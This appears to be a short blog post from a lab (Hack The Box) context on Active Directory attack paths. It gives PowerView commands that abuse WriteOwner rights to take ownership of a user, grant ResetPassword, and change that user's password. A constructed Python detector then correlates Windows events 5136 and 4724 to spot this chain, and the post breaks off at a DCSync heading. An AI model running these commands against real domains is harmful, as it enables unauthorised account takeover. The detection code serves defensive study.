Active Directory Attack paths (with exploitation) (will be updated as I learn more):

n00🔑
Jan 7, 2021
1. Abusing WriteOwner rights:
tom (left) has WriteOwner rights to claire (middle)

a) Change owner of claire to ourselves(tom)

Set-DomainObjectOwner -Identity claire -OwnerIdentity tom
Set-DomainObjectOwner -Identity <target-user> -OwnerIdentity <current-user>

b) Get Reset Password permission.

Add-DomainObjectAcl -TargetIdentity htb\claire -PrincipalIdentity htb\tom -Rights ResetPassword
Add-DomainObjectAcl -TargetIdentity <target-user> -PrincipalIdentity <current-user> -Rights ResetPassword
Changing ownership

c) Change Password.

Set-DomainObjectOwner -Identity claire -OwnerIdentity tom -verbose
Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -verbose
$newpass = ConvertTo-SecureString -String 'P@$$w0rd!1234' -AsPlainText -Force
Set-DomainUserPassword -Identity claire -AccountPassword $newpass -verbose
Changed the password
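
A defender-side view of steps a) to c), as an added example that is not part of the original post: it correlates a rewrite of a user's nTSecurityDescriptor (event 5136) with a password reset of that user by the same actor (event 4724) and reports whether the SDDL owner changed. The event records are constructed and simplified (field names, SIDs and timestamps are assumptions, and the object's CN is assumed to equal its sAMAccountName).

```python
import re
from datetime import datetime, timedelta

# Constructed, simplified Security-log records: 5136 = directory object
# modified, 4724 = password reset attempt. SIDs and times are made up.
EVENTS = [
    {"id": 5136, "time": "2021-01-07T10:00:05", "subject": "tom", "op": "deleted",
     "dn": "CN=claire,CN=Users,DC=htb,DC=local", "attr": "nTSecurityDescriptor",
     "value": "O:DAG:DAD:AI(A;;RPWP;;;DA)"},
    {"id": 5136, "time": "2021-01-07T10:00:05", "subject": "tom", "op": "added",
     "dn": "CN=claire,CN=Users,DC=htb,DC=local", "attr": "nTSecurityDescriptor",
     "value": "O:S-1-5-21-1111-2222-3333-1104G:DAD:AI(A;;RPWP;;;DA)"},
    {"id": 4724, "time": "2021-01-07T10:02:40", "subject": "tom", "target": "claire"},
    {"id": 4724, "time": "2021-01-07T11:30:00", "subject": "helpdesk", "target": "bob"},
]

OWNER_RE = re.compile(r"^O:(S-[\d-]+|[A-Z]{2})")

def sddl_owner(sddl):
    """Return the owner SID (or two-letter alias) from an SDDL string."""
    m = OWNER_RE.match(sddl)
    return m.group(1) if m else None

def find_takeover_chains(events, window=timedelta(minutes=30)):
    """Flag password resets preceded by the same actor rewriting the
    target's security descriptor (owner and/or DACL) within `window`."""
    changes = {}  # (actor, target) -> {"times": [...], "owners": {op: sid}}
    for e in events:
        if e["id"] == 5136 and e["attr"] == "nTSecurityDescriptor":
            # Assumption: the object's CN equals its sAMAccountName.
            cn = e["dn"].split(",")[0].partition("=")[2].lower()
            c = changes.setdefault((e["subject"].lower(), cn), {"times": [], "owners": {}})
            c["times"].append(datetime.fromisoformat(e["time"]))
            c["owners"][e["op"]] = sddl_owner(e["value"])
    findings = []
    for e in events:
        # A user changing their own password is not part of this pattern.
        if e["id"] != 4724 or e["subject"].lower() == e["target"].lower():
            continue
        c = changes.get((e["subject"].lower(), e["target"].lower()))
        reset_at = datetime.fromisoformat(e["time"])
        if c and any(timedelta(0) <= reset_at - t <= window for t in c["times"]):
            owners = c["owners"]
            findings.append({"actor": e["subject"], "target": e["target"],
                             "owner_changed": owners.get("deleted") != owners.get("added")})
    return findings

if __name__ == "__main__":
    for f in find_takeover_chains(EVENTS):
        print(f)
```

Event 5136 is only written when Directory Service Changes auditing is enabled and the object's SACL covers the write, so a missing match does not mean the change did not happen.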

2. DCSync…
